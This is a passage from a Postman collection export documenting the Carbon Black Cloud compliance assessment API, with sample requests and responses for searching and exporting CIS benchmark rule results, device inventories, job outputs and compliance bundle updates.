\"39285D6D-3D69-55A5-9C99-1EA0FC5ACAD3\",\n            \"section_name\": \"Private Profile\",\n            \"compliant_assets\": 12,\n            \"non_compliant_assets\": 2,\n            \"profile\": [\n                \"Level 1 Domain Controller\",\n                \"Level 1 Member Server\"\n            ]\n        }\n        ... truncated ... \n    ]\n}\n        "}],"_postman_id":"68719853-ad22-4b44-96b2-a8a08855bd56"},{"name":"Export Rule Compliance Summaries","id":"632e036c-41bb-4e79-a58d-5425bd75bc79","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"start\": \"<integer>\",\n    \"criteria\": {\n        \"<fieldname>\": [\n            \"<value>\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ],\n    \"format\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/compliance/rules/_export","description":"<p>The export endpoint is asynchronous; firstly use the endpoint defined here to create a job with required search criteria to limit the results, then use the Download Job Output in the Jobs Service to get the results. The Download Job API requires the permission jobs.status - READ.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"query\": \"&lt;string&gt;\",\n    \"rows\": \"&lt;integer&gt;\",\n    \"start\": \"&lt;integer&gt;\",\n    \"criteria\": {\n        \"&lt;fieldname&gt;\": [\n            \"&lt;value&gt;\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"&lt;string&gt;\",\n            \"order\": \"&lt;string&gt;\"\n        }\n    ],\n    \"format\": \"&lt;string&gt;\"\n}\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/#export-compliance-information-for-rules\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}","compliance","rules","_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"4b63bb01-44ff-4956-bbbf-182b4c3a1db5","name":"Export Rule Compliance Summaries","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"windows\",\n    \"rows\": 20,\n    \"start\": 0,\n    \"format\": \"CSV\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/compliance/rules/_export"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": 211148\n}"},{"id":"55e1451b-5b05-4e7f-b2de-4d0b04e0bf2a","name":"Download Job Output - CSV","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}/download"},"_postman_previewlanguage":null,"header":null,"cookie":[],"responseTime":null,"body":"\"Recommendation Name\",\"Section Name\",\"Compliant Assets\",\"Non Compliant Assets\",\"Compliant Assets Ids\",\"Non Compliant Assets Ids\",\"Benchmark Set Id\",\"Benchmark Set Name\",\"Recommendation Id\",\"Remediation\"\n\"(L1) Ensure 'Windows Firewall: Private: Firewall state' is set to 'On (recommended)'\",\"Private Profile\",\"0\",\"1\",\"\",\"\"\"46250900\"\"\",\"fa6e421c-e75a-483c-bea3-842fb1b52705\",\"CIS Compliance - Microsoft Windows Server\",\"00869D86-6E61-4D7D-A0A3-6F5CDE2E5753\",\"To establish the recommended configuration via GP, set the following UI path to On (recommended):    Computer Configuration\\Policies\\Windows Settings\\Security Settings\\Windows Firewall with Advanced Security\\Windows Firewall with Advanced Security\\Windows Firewall Properties\\Private Profile\\Firewall state \""},{"id":"7c2e1146-8258-4560-aa38-14418c91c40f","name":"Download Job Output - JSON","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}/download"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"x-amz-id-2","value":"RD4xGMHc/b2cumFMtnlGDlvYMzsjbygV49jax6gDzdUjHycfZA2hv174o8hRCWBp/Y2AJ+rfv6AaZ3LDJs3gYg=="},{"key":"x-amz-request-id","value":"EJEY18BRWT874347"},{"key":"Date","value":"Tue, 19 Dec 2023 12:35:03 GMT"},{"key":"Last-Modified","value":"Tue, 19 Dec 2023 12:34:47 GMT"},{"key":"x-amz-expiration","value":"expiry-date=\"Fri, 19 Jan 2024 00:00:00 GMT\", rule-id=\"JobOutputCleanup\""},{"key":"ETag","value":"\"8aba4db66937a6a507aa585ddb77a0f2-1\""},{"key":"x-amz-server-side-encryption","value":"AES256"},{"key":"Accept-Ranges","value":"bytes"},{"key":"Content-Type","value":"application/json","description":""},{"key":"Server","value":"AmazonS3"},{"key":"Content-Length","value":"47202"}],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"Non Compliant Assets Ids\": [\n            \"46250900\"\n        ],\n        \"Compliant Assets Ids\": [],\n        \"Benchmark Set Id\": \"fa6e421c-e75a-483c-bea3-842fb1b52705\",\n        \"Non Compliant Assets\": 1,\n        \"Benchmark Set Name\": \"CIS Compliance - Microsoft Windows Server\",\n        \"Recommendation Name\": \"(L1) Ensure 'Windows Firewall: Private: Firewall state' is set to 'On (recommended)'\",\n        \"Compliant Assets\": 0,\n        \"Remediation\": \"To establish the recommended configuration via GP, set the following UI path to On (recommended):    Computer Configuration\\\\Policies\\\\Windows Settings\\\\Security Settings\\\\Windows Firewall with Advanced Security\\\\Windows Firewall with Advanced Security\\\\Windows Firewall Properties\\\\Private Profile\\\\Firewall state \",\n        \"Section Name\": \"Private Profile\",\n        \"Recommendation Id\": \"00869D86-6E61-4D7D-A0A3-6F5CDE2E5753\"\n    }\n]"}],"_postman_id":"632e036c-41bb-4e79-a58d-5425bd75bc79"},{"name":"Search Compliance Results for a Device","id":"ab444ec6-c538-4892-ac7d-346b4dfd0743","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"password\",\n    \"rows\": 1\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/compliance/devices/{{cb_device_id}}/rules/_search","description":"<p>Search and return rule compliance results for a specified Device.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<p><code> json {     \"query\": \"&lt;string&gt;\",     \"rows\": \"&lt;integer&gt;\",     \"start\": \"&lt;integer&gt;\",     \"criteria\": {         \"&lt;fieldname&gt;\": [             \"&lt;value&gt;\"         ]     },     \"sort\": [         {             \"field\": \"&lt;string&gt;\",             \"order\": \"&lt;string&gt;\"         }     ] }</code></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/#search-rule-compliance-results-for-a-device\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}","compliance","devices","{{cb_device_id}}","rules","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"ab444ec6-c538-4892-ac7d-346b4dfd0743"},{"name":"Search Device Rule Results","id":"a5ebfa96-d460-4e83-8e38-64f355207aed","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"DEMO\",\n    \"rows\": \"1\",\n    \"start\": \"0\",\n    \"sort\": [\n        {\n            \"field\": \"device_name\",\n            \"order\": \"ASC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/compliance/rules/{{cb_benchmark_set_rule_id}}/devices/_search","description":"<p>Search and return rule compliance results for Devices that match the search criteria within the specified Benchmark Set and Rule.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.vcenter.vm</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"query\": \"&lt;string&gt;\",\n    \"rows\": \"&lt;integer&gt;\",\n    \"start\": \"&lt;integer&gt;\",\n    \"criteria\": {\n        \"&lt;fieldname&gt;\": [\n            \"&lt;value&gt;\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"&lt;string&gt;\",\n            \"order\": \"&lt;string&gt;\"\n        }\n    ]\n}\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/#search-for-rule-results-for-devices\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}","compliance","rules","{{cb_benchmark_set_rule_id}}","devices","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"d367e1a8-1499-4fe8-b3fe-1825c952886a","name":"Search Device Rule Results","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"DEMO\",\n    \"rows\": \"1\",\n    \"start\": \"0\",\n    \"sort\": [\n        {\n            \"field\": \"device_name\",\n            \"order\": \"ASC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/compliance/rules/{{cb_benchmark_set_rule_id}}/devices/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 13,\n    \"results\": [\n        {\n            \"device_id\": 37954691,\n            \"device_name\": \"DEMO\\\\A202323163424\",\n            \"os_version\": \"Windows Server 2022 x64\",\n            \"compliance_result\": true\n        }\n    ]\n}"}],"_postman_id":"a5ebfa96-d460-4e83-8e38-64f355207aed"}],"id":"f1c5118b-8bf8-46bb-bf99-7f4334f979bd","_postman_id":"f1c5118b-8bf8-46bb-bf99-7f4334f979bd","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Devices","item":[{"name":"Search Devices in a Benchmark Set","id":"d1b3782b-49a7-47d8-a2bf-5eecbf78d1fd","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"windows\",\n    \"rows\": 20,\n    \"start\": 0,\n    \"criteria\": {\n        \"os_type\": [\n            \"WINDOWS\"\n        ]\n    },\n    \"exclusions\": {\n        \"cis_version\": [\n            \"1.4.0\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"create_time\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/inventory/devices/_search","description":"<p>Get the Device Summary from Inventory for devices in a Benchmark Set.</p>\n<p>RBAC Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"query\": \"&lt;string&gt;\",\n  \"rows\": \"&lt;integer&gt;\",\n  \"start\": \"&lt;integer&gt;\",\n  \"criteria\": {\n      \"&lt;fieldname&gt;\": [\n          \"&lt;string&gt;\"\n      ]},\n   \"exclusions\": {\n      \"&lt;fieldname&gt;\": [\n          \"&lt;string&gt;\"\n      ]},\n    \"sort\": [\n        {\n        \"field\": \"&lt;string&gt;\",\n        \"order\": \"&lt;string&gt;\"\n        }\n    ]\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/#search-benchmark-sets\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}","inventory","devices","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"c31834da-4c31-4816-a76e-afcded68d6dc","name":"Search Devices in a Benchmark Set","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"windows\",\n    \"rows\": 1,\n    \"start\": 0,\n    \"criteria\": {\n        \"os_type\": [\n            \"WINDOWS\"\n        ]\n    },\n    \"exclusions\": {\n        \"cis_version\": [\n            \"1.4.0\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"create_time\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/inventory/devices/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 19 Dec 2023 09:22:24 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"690"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 4568,\n    \"results\": [\n        {\n            \"device_id\": 12345678,\n            \"device_name\": \"TEST\\\\DEMO-MACHINE\",\n            \"host_name\": null,\n            \"os_version\": \"Windows Server 2019 x64\",\n            \"reason\": \"ASSESSMENT_SCHEDULED\",\n            \"sensor_version\": \"3.9.0\",\n            \"last_checkin_time\": \"2023-12-19T08:37:03.126Z\",\n            \"deployment_type\": \"WORKLOAD\"\n        }\n    ]\n}"}],"_postman_id":"d1b3782b-49a7-47d8-a2bf-5eecbf78d1fd"},{"name":"Export Devices in a Benchmark Set","id":"4d749feb-cc35-4d0c-a992-213deecd9dc3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"windows\",\n    \"rows\": 20,\n    \"start\": 0,\n    \"criteria\": {\n        \"os_type\": [\n            \"WINDOWS\"\n        ]\n    },\n    \"exclusions\": {\n        \"cis_version\": [\n            \"1.4.0\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"create_time\",\n            \"order\": \"DESC\"\n        }\n    ],\n    \"format\": \"json\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/inventory/devices/_export","description":"<p>Export the Device Summary for devices in a Benchmark Set in CSV or JSON format.</p>\n<p>To receive the actual JSON or CSV results, you need to use the Job Service API. First, use the Get Job Details to get the status of the async job, then Download Job Output call to download the actual content.</p>\n<p>RBAC Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"query\": \"&lt;string&gt;\",\n  \"rows\": \"&lt;integer&gt;\",\n  \"start\": \"&lt;integer&gt;\",\n  \"criteria\": {\n      \"&lt;fieldname&gt;\": [\n          \"&lt;string&gt;\"\n      ]},\n   \"exclusions\": {\n      \"&lt;fieldname&gt;\": [\n          \"&lt;string&gt;\"\n      ]},\n    \"sort\": [\n        {\n        \"field\": \"&lt;string&gt;\",\n        \"order\": \"&lt;string&gt;\"\n        }\n    ],\n    \"format\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/#search-benchmark-sets\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}","inventory","devices","_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"0dfad9e0-3496-408a-8942-58678ede2f68","name":"Export Devices in a Benchmark Set","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"windows\",\n    \"rows\": 1,\n    \"start\": 0,\n    \"criteria\": {\n        \"os_type\": [\n            \"WINDOWS\"\n        ]\n    },\n    \"exclusions\": {\n        \"cis_version\": [\n            \"1.4.0\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"create_time\",\n            \"order\": \"DESC\"\n        }\n    ],\n    \"format\": \"JSON\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/inventory/devices/_export"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 19 Dec 2023 10:45:32 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"21"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": 968091\n}"},{"id":"9a4a98d9-59f3-4be2-8d1c-8eec8d9ac13c","name":"Get Job Details","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 19 Dec 2023 10:54:06 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"146"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"0"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": 968091,\n    \"type\": \"EXTERNAL\",\n    \"job_parameters\": {\n        \"job_parameters\": null\n    },\n    \"org_key\": \"ABCD1234\",\n    \"status\": \"COMPLETED\",\n    \"create_time\": \"2023-12-19T10:45:32.039176Z\",\n    \"last_update_time\": \"2023-12-19T10:45:34.727788Z\"\n}"},{"id":"a93d0ed7-c5c6-4b9f-9605-5ae006493887","name":"Download Job Output - CSV","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}/download"},"status":"OK","code":200,"_postman_previewlanguage":"raw","header":[{"key":"x-amz-id-2","value":"itMeMREW263qYY/j7oNe84w6cFVzdnkNDeoCtquW65UK4YlYILDyvItfQB4/G7UvaZoqxCyKCQ8="},{"key":"x-amz-request-id","value":"F95J1H8CGSKM6AEY"},{"key":"Date","value":"Tue, 19 Dec 2023 10:54:37 GMT"},{"key":"Last-Modified","value":"Tue, 19 Dec 2023 10:45:33 GMT"},{"key":"x-amz-expiration","value":"expiry-date=\"Fri, 19 Jan 2024 00:00:00 GMT\", rule-id=\"JobOutputCleanup\""},{"key":"ETag","value":"\"87149e569c8bc842f6470658b073d19f-1\""},{"key":"x-amz-server-side-encryption","value":"AES256"},{"key":"Accept-Ranges","value":"bytes"},{"key":"Content-Type","value":"binary/octet-stream"},{"key":"Server","value":"AmazonS3"},{"key":"Content-Length","value":"538576"}],"cookie":[],"responseTime":null,"body":"\"VM Name\",\"OS Version\",\"Sensor Version\",\"Last Checkin Time\",\"Reason\",\"Asset Type\"\n\"TEST\\DEMO-MACHINE\",\"Windows Server 2019 x64\",\"4.0.0.1292\",\"2023-12-19\",\"Assessment Scheduled\",\"WORKLOAD\""},{"id":"f76acc4b-858f-49b7-8607-9522feef4da9","name":"Download Job Output - JSON","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}/download"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"x-amz-id-2","value":"UtW82a/2F4Gu61XaBOjt6sXO3r6nXHBMpN4vDngFi6VIjbKfLWYPI36p99N677bwoI4tmhOVZ3zTT9qRhGgkyA=="},{"key":"x-amz-request-id","value":"X62EYHGJFZR2NMCA"},{"key":"Date","value":"Tue, 19 Dec 2023 11:49:33 GMT"},{"key":"Last-Modified","value":"Tue, 19 Dec 2023 11:48:55 GMT"},{"key":"x-amz-expiration","value":"expiry-date=\"Fri, 19 Jan 2024 00:00:00 GMT\", rule-id=\"JobOutputCleanup\""},{"key":"ETag","value":"\"2f2a500504ec7b7aa84cc7a69ebd0883-1\""},{"key":"x-amz-server-side-encryption","value":"AES256"},{"key":"Accept-Ranges","value":"bytes"},{"key":"Content-Type","value":"application/json","description":""},{"key":"Server","value":"AmazonS3"},{"key":"Content-Length","value":"926779"}],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"VM Name\": \"TEST\\\\DEMO-MACHINE\",\n        \"OS Version\": \"Windows Server 2019 x64\",\n        \"Sensor Version\": \"4.0.0.1292\",\n        \"Asset Type\": \"WORKLOAD\",\n        \"Last Checkin Time\": \"2023-12-19\",\n        \"Reason\": \"ASSESSMENT_SCHEDULED\"\n    }\n]"}],"_postman_id":"4d749feb-cc35-4d0c-a992-213deecd9dc3"}],"id":"434404a5-be01-43f6-89ca-768e43eda27e","description":"<p>Endpoints that return device information</p>\n","_postman_id":"434404a5-be01-43f6-89ca-768e43eda27e","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Bundles","item":[{"name":"Get Compliance Bundle Version Updates","id":"db740842-a59b-40b0-b664-44b366c7db66","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"/compliance/assessment/api/v1/orgs/{{cb_org_key}}/bundles/updates?acknowledged=true&since=180d","description":"<p>Get the updates to compliance bundles that occurred after a given time. The time can be in minutes, hours, days, or weeks.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/cis-benchmark-api/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","bundles","updates"],"query":[{"description":{"content":"<p>Whether to fetch acknowledged bundle updates or not, Boolean</p>\n","type":"text/plain"},"key":"acknowledged","value":"true"},{"description":{"content":"<p>The period of time to search for updated versions. Can be in minutes, hours, days, or weeks.</p>\n","type":"text/plain"},"key":"since","value":"180d"}],"variable":[]}},"response":[{"id":"df982048-6c23-4f2c-b5fe-b51093ddf09f","name":"Get Compliance Bundle Version Updates","originalRequest":{"method":"GET","header":[],"url":{"raw":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/bundles/updates?acknowledged=true&since=180d","host":["{{cb_url}}"],"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","bundles","updates"],"query":[{"key":"acknowledged","value":"true","description":"Whether to fetch acknowledged bundle updates or not, Boolean"},{"key":"since","value":"180d","description":"Compliance Bundle Version Updates since given time. It can be in minutes, hours, days, or weeks."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 14 Feb 2024 20:17:50 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"207"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"bundle_id\": \"a0423be0-eddd-4170-99fc-78d5cb8f157f\",\n        \"new_version\": \"1.0.0.2\",\n        \"old_version\": \"1.0.0.1\",\n        \"update_time\": \"2023-09-29T07:21:43.185547Z\",\n        \"status\": \"COMPLETED\",\n        \"bundle_name\": \"TEST CIS Compliance - Microsoft Windows Server\",\n        \"os_family\": \"TEST_WINDOWS_SERVER\",\n        \"acknowledged\": true\n    }\n]"}],"_postman_id":"db740842-a59b-40b0-b664-44b366c7db66"},{"name":"Acknowledge Compliance Bundle 